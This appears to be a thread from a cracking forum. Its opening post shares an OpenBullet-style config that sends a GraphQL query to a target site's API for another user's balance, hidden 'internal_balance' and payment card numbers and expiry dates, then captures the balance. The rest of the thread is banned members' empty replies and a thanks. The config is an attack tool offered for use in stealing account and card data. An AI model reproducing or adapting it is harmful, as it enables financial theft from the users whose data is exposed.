This post is by a banned member (TheMekanic) - Unhide
OP 08 March, 2026 - 10:06 PM
Reply
Hidden Content
You must
register or
login to view this content.
Code:
BLOCK:HttpRequest url = "https://api.site.com/graphql" method = POST // Querying for 'internal_balance' and 'payment_methods' which are usually hidden content = "{\"query\":\"{user(id:\\\"<USER>\\\"){balance,internal_balance,payment_methods{card_number,expiry}}}\"}" contentType = "application/json" ENDBLOCK BLOCK:Parse input = @data.SOURCE leftDelim = "internal_balance\":" rightDelim = "," => VAR @CAPTURE_BALANCE ENDBLOCK
This post is by a banned member (zhangleon1) - Unhide
08 March, 2026 - 10:37 PM
Reply
This post is by a banned member (KOKO903) - Unhide
09 March, 2026 - 09:34 AM
Reply
This post is by a banned member (ramjaatz) - Unhide
09 March, 2026 - 05:25 PM
Reply
This post is by a banned member (Barret_drake) - Unhide
13 April, 2026 - 08:57 PM
Reply
(08 March, 2026 - 10:06 PM)TheMekanic Wrote: Show More
thanks bro
This post is by a banned member (Crackch) - Unhide
17 May, 2026 - 11:10 AM
Reply